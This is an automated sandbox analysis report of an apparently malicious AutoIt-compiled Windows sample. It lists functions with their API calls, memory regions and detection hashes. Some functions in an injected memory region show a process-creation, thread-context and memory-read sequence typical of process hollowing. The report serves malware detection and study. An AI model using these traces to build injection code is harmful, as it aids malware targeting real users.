                                control_flow_graph 1312 c7eb05-c7eb2f call c6c4cd RegOpenKeyExW 1315 c7eb35-c7eb39 1312->1315 1316 cd4b17-cd4b2e RegQueryValueExW 1312->1316 1317 cd4b91-cd4b9a RegCloseKey 1316->1317 1318 cd4b30-cd4b6d call c8010a call c64bce RegQueryValueExW 1316->1318 1323 cd4b6f-cd4b86 call c67e53 1318->1323 1324 cd4b88-cd4b90 call c64fd2 1318->1324 1323->1324 1324->1317
                                APIs
                                • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00C7EADA,?,?), ref: 00C7EB27
                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00C7EADA,?,?), ref: 00CD4B26
                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00C7EADA,?,?), ref: 00CD4B65
                                • RegCloseKey.ADVAPI32(?,?,00C7EADA,?,?), ref: 00CD4B94
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: QueryValue$CloseOpen
                                • String ID: Include$Software\AutoIt v3\AutoIt
                                • API String ID: 1586453840-614718249
                                • Opcode ID: 707387f4877b8241e330e0d74694db8ba0a9579e9caafc3b9cb537b3250dab08
                                • Instruction ID: 11cea25cbc8760932ec88722b9839f0a89db7629f4d357674a77a265da4fe800
                                • Opcode Fuzzy Hash: 707387f4877b8241e330e0d74694db8ba0a9579e9caafc3b9cb537b3250dab08
                                • Instruction Fuzzy Hash: 1B114C71600108BFEB14EBA4CD86EFE77BCEF04354F10046AB607E6191EA719E05EB50
                                Function 00C62E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1339 c62e9d-c62f0d CreateWindowExW * 2 ShowWindow * 2
                                APIs
                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C62ECB
                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C62EEC
                                • ShowWindow.USER32(00000000), ref: 00C62F00
                                • ShowWindow.USER32(00000000), ref: 00C62F09
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$CreateShow
                                • String ID: AutoIt v3$edit
                                • API String ID: 1584632944-3779509399
                                • Opcode ID: dc54fc92db0a00fa36277a2b7798ab77c702a8f21d45d92c76f83bbc0864340a
                                • Instruction ID: 2a869791a2c3ee9d8501f50d854a51976a08ba1c27e6141dbb2739069fd999f0
                                • Opcode Fuzzy Hash: dc54fc92db0a00fa36277a2b7798ab77c702a8f21d45d92c76f83bbc0864340a
                                • Instruction Fuzzy Hash: DBF030745403D47AD73057536D48F773E7EE7E6F50B01802EBA05D6260C1610882DA75
                                Function 033923B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 033922A0: Sleep.KERNEL32(000001F4), ref: 033922B1
                                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 033924D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366580328.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3390000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CreateFileSleep
                                • String ID: E14PKPAU6XUUH34EOWXSTU
                                • API String ID: 2694422964-1101135582
                                • Opcode ID: cb6d3909dd7b49935a17262c909cb094619075df6dd4731b8c357463f613c89a
                                • Instruction ID: 1ba71473298b02e1318f6e839811ff04cb942eee7607eac727a56f93a49bb8b7
                                • Opcode Fuzzy Hash: cb6d3909dd7b49935a17262c909cb094619075df6dd4731b8c357463f613c89a
                                • Instruction Fuzzy Hash: CD518130D0464DEBEF11DBA4C858BEFBB78AF19305F044599E608BB2C1D6791B44CBA5
                                Function 00C638E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                                Download Yara Rule
                                APIs
                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00CD454E
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                • _memset.LIBCMT ref: 00C63965
                                • _wcscpy.LIBCMT ref: 00C639B5
                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C639C6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                • String ID: Line:
                                • API String ID: 3942752672-1585850449
                                • Opcode ID: 5946198ac3d295ebeaeb5612d7f6a8a1931a566742dcd626e79ccd9864196fd8
                                • Instruction ID: e77773b317f8a5cf7a166a8cf4aa275f36f82d3f52be64d49d7e08b6f0032e0b
                                • Opcode Fuzzy Hash: 5946198ac3d295ebeaeb5612d7f6a8a1931a566742dcd626e79ccd9864196fd8
                                • Instruction Fuzzy Hash: F031D671008380ABD731EB60DC85FDF77E8AF69314F00491EF699921A1DB709B49DBA6
                                Function 00C63DCB Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C63F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00C634E2,?,00000001), ref: 00C63FCD
                                • _free.LIBCMT ref: 00CD3C27
                                • _free.LIBCMT ref: 00CD3C6E
                                  • Part of subcall function 00C6BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00D222E8,?,00000000,?,00C63E2E,?,00000000,?,00CFDBF0,00000000,?), ref: 00C6BE8B
                                  • Part of subcall function 00C6BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00C63E2E,?,00000000,?,00CFDBF0,00000000,?,00000002), ref: 00C6BEA7
                                  • Part of subcall function 00C6BDF0: __wsplitpath.LIBCMT ref: 00C6BF19
                                  • Part of subcall function 00C6BDF0: _wcscpy.LIBCMT ref: 00C6BF31
                                  • Part of subcall function 00C6BDF0: _wcscat.LIBCMT ref: 00C6BF46
                                  • Part of subcall function 00C6BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00C6BF56
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                • API String ID: 1510338132-1757145024
                                • Opcode ID: 1318d2f2de4136b35f53d426f5eadf25fd8d9752c160370fb5e84128523cbe1e
                                • Instruction ID: 2ea72bf4becaea0ac25df8f4c9980d7f246418c5285d681a15b79fff78f74ebd
                                • Opcode Fuzzy Hash: 1318d2f2de4136b35f53d426f5eadf25fd8d9752c160370fb5e84128523cbe1e
                                • Instruction Fuzzy Hash: B5919071A10259AFCF14EFA4CC919EEB7B4BF09314F10442AF516EB291EB709E05DB61
                                Function 00C8413E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                • __getstream.LIBCMT ref: 00C8418E
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 00C841C9
                                • __wopenfile.LIBCMT ref: 00C841D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                • String ID: <G
                                • API String ID: 1820251861-2138716496
                                • Opcode ID: f58a082e5a01faf608e454c00a2209c1085f30f4695b1040e8d28ed1f4522fb3
                                • Instruction ID: ef922d889c36cae493ceb38749af47cb3faddca1b52d8935977564df6e792d8c
                                • Opcode Fuzzy Hash: f58a082e5a01faf608e454c00a2209c1085f30f4695b1040e8d28ed1f4522fb3
                                • Instruction Fuzzy Hash: F4113670900207AFDB14BFB48C426AF36A0AF1136CB158529A424CB2C1FB74CA81A769
                                Function 00C7C955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C7C948,SwapMouseButtons,00000004,?), ref: 00C7C979
                                • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00C7C948,SwapMouseButtons,00000004,?,?,?,?,00C7BF22), ref: 00C7C99A
                                • RegCloseKey.KERNEL32(00000000,?,?,00C7C948,SwapMouseButtons,00000004,?,?,?,?,00C7BF22), ref: 00C7C9BC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: Control Panel\Mouse
                                • API String ID: 3677997916-824357125
                                • Opcode ID: ddd7d6fe889aaae76396525aa80d6bb55161939cabd1f54e8e64fed2f2cb9685
                                • Instruction ID: b153e8b1ac47ba80cc96fda76a8aca6b00b65581a367861c1b06550a6b136c21
                                • Opcode Fuzzy Hash: ddd7d6fe889aaae76396525aa80d6bb55161939cabd1f54e8e64fed2f2cb9685
                                • Instruction Fuzzy Hash: 48117C75511209FFDB608FA4DC85EEE77B8EF04740F00841AAA4AE7210E2319E409B60
                                Function 033912A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessW.KERNEL32(?,00000000), ref: 03391A5B
                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03391AF1
                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 03391B13
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366580328.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3390000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                • String ID:
                                • API String ID: 2438371351-0
                                • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                • Instruction ID: 9bab219aff213e368792a5ff636ecfdaa12f1d57eb632ebd357bd2fbac9cd63c
                                • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                • Instruction Fuzzy Hash: 76620A34E14259DBEB24CBA4CC90BDEB376EF58300F1091A9D10DEB2A4E7759E81CB59
                                Function 00C6131C Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C616F2: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C614EB), ref: 00C61751
                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C6159B
                                • CoInitialize.OLE32(00000000), ref: 00C61612
                                • CloseHandle.KERNEL32(00000000), ref: 00CD58F7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Handle$CloseInitializeMessageRegisterWindow
                                • String ID: `T
                                • API String ID: 3815369404-1867313790
                                • Opcode ID: 11b55a0d13ca000ffa0c1c0f5c2095ca21c885349b6073d67f4222caad4a8e7f
                                • Instruction ID: bebab35a36c17c8a1b5f3654827bae8580bb8a211e9dcaba764abb29a6ab2c34
                                • Opcode Fuzzy Hash: 11b55a0d13ca000ffa0c1c0f5c2095ca21c885349b6073d67f4222caad4a8e7f
                                • Instruction Fuzzy Hash: 8D718ABC9013599AC334EF6AA990558BBA5FBB8345798C16ED00EC7362CB305547CF31
                                Function 00C63BFF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 00CD3CF1
                                • GetOpenFileNameW.COMDLG32(?,?,00000001,00D222E8), ref: 00CD3D35
                                  • Part of subcall function 00C631B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00C631DA
                                  • Part of subcall function 00C63A67: SHGetMalloc.SHELL32(00C63C31), ref: 00C63A7D
                                  • Part of subcall function 00C63A67: SHGetDesktopFolder.SHELL32(?), ref: 00C63A8F
                                  • Part of subcall function 00C63A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00C63AD2
                                  • Part of subcall function 00C63B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00D222E8,?), ref: 00C63B65
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen_memset
                                • String ID: X
                                • API String ID: 3714316930-3081909835
                                • Opcode ID: 280803780eec846662504400349bbecdd09f866bf30cc630e6df9b312a22159d
                                • Instruction ID: 5df2a3e56b317a85296e7182f2681815edd18ac249c0b6677dde66699e4ccfb8
                                • Opcode Fuzzy Hash: 280803780eec846662504400349bbecdd09f866bf30cc630e6df9b312a22159d
                                • Instruction Fuzzy Hash: BD11A3B1A102D8ABCF15DFD4D8456DEBBFDAF46704F04800AE411BB382CBB54A499BA5
                                Function 00CAD009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                • GetTempPathW.KERNEL32(00000104,?), ref: 00CAD01E
                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00CAD035
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Temp$FileNamePath
                                • String ID: aut
                                • API String ID: 3285503233-3010740371
                                • Opcode ID: 6825cb770bf20c1523f39015f1375d240906d96fdc8c97ff04e6ba0746026997
                                • Instruction ID: a64536b3e0e1cdaf6d50870529dda0ea9243748d6ff574bf28016f19040f9f04
                                • Opcode Fuzzy Hash: 6825cb770bf20c1523f39015f1375d240906d96fdc8c97ff04e6ba0746026997
                                • Instruction Fuzzy Hash: 14D05EB154030EBFDB10ABA0ED4EF997B6CA700704F1041907715D90D1D6B0DA498FA0
                                Function 00CBF79F Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d43b0e84056856d0fd94bdecc7a5e7f495b83b22c5751e2f667560acfc3f880e
                                • Instruction ID: f5491a0bd71a55833b5ad8931abfc1caa1dd7969c17d3f4d05420d64eac4ef8d
                                • Opcode Fuzzy Hash: d43b0e84056856d0fd94bdecc7a5e7f495b83b22c5751e2f667560acfc3f880e
                                • Instruction Fuzzy Hash: 7AF17C716047019FC714DF28C894B9ABBE5FF88314F14892DF9999B392DB31E946CB82
                                Function 00C63A67 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                Download Yara Rule
                                APIs
                                • SHGetMalloc.SHELL32(00C63C31), ref: 00C63A7D
                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00C63AD2
                                • SHGetDesktopFolder.SHELL32(?), ref: 00C63A8F
                                  • Part of subcall function 00C63B1E: _wcsncpy.LIBCMT ref: 00C63B32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                • String ID:
                                • API String ID: 3981382179-0
                                • Opcode ID: 6c34e54bbf17b6145be8f7516b8325d921e4a60527c5ea2154f4b156ff51ea35
                                • Instruction ID: 41a5fb5b265ccaf1763a2127b1f5dcd5910a686d47ccbb817d3c031d5e451846
                                • Opcode Fuzzy Hash: 6c34e54bbf17b6145be8f7516b8325d921e4a60527c5ea2154f4b156ff51ea35
                                • Instruction Fuzzy Hash: 5F214F76B00158ABCB24DF95DC84EEEB7BDEF88700B144099F50ADB251DB309E46DB94
                                Function 00C63598 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 00C635BE
                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C63667
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: IconNotifyShell__memset
                                • String ID:
                                • API String ID: 928536360-0
                                • Opcode ID: 8085de7e48a5d2d5d187ead4a6775fa33475beaba6e59d1c9b88c523cb19a63b
                                • Instruction ID: 94b627f843d413ad03c2512620cd7b21eba98b3f1682333cea446cffbc408e2b
                                • Opcode Fuzzy Hash: 8085de7e48a5d2d5d187ead4a6775fa33475beaba6e59d1c9b88c523cb19a63b
                                • Instruction Fuzzy Hash: D83182B05043419FC731DF25D885697BBE4FB69308F00492EF69AC7381E771AA49CBA6
                                Function 00C845EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __FF_MSGBANNER.LIBCMT ref: 00C84603
                                  • Part of subcall function 00C88E52: __NMSG_WRITE.LIBCMT ref: 00C88E79
                                  • Part of subcall function 00C88E52: __NMSG_WRITE.LIBCMT ref: 00C88E83
                                • __NMSG_WRITE.LIBCMT ref: 00C8460A
                                  • Part of subcall function 00C88EB2: GetModuleFileNameW.KERNEL32(00000000,00D20312,00000104,?,00000001,00C80127), ref: 00C88F44
                                  • Part of subcall function 00C88EB2: ___crtMessageBoxW.LIBCMT ref: 00C88FF2
                                  • Part of subcall function 00C81D65: ___crtCorExitProcess.LIBCMT ref: 00C81D6B
                                  • Part of subcall function 00C81D65: ExitProcess.KERNEL32 ref: 00C81D74
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                • RtlAllocateHeap.NTDLL(00DD0000,00000000,00000001,?,?,?,?,00C80127,?,00C6125D,00000058,?,?), ref: 00C8462F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                • String ID:
                                • API String ID: 1372826849-0
                                • Opcode ID: e1950e526c69b14723f1d9dfcfcedd1d56fbd886a86131cba46f5065273d793c
                                • Instruction ID: 72c1346a4e5bf27cc6b9af27e35e32a6bf4a2285007df7997b56818f4060f02d
                                • Opcode Fuzzy Hash: e1950e526c69b14723f1d9dfcfcedd1d56fbd886a86131cba46f5065273d793c
                                • Instruction Fuzzy Hash: E001F931601312ABE6283B24AC41B6E3748AF8376DF55012AF511DB1C2EFB09C41976C
                                Function 00CACFC8 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00CACC71,?,?,?,?,?,00000004), ref: 00CACFE1
                                • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00CACC71,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00CACFF7
                                • CloseHandle.KERNEL32(00000000,?,00CACC71,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CACFFE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
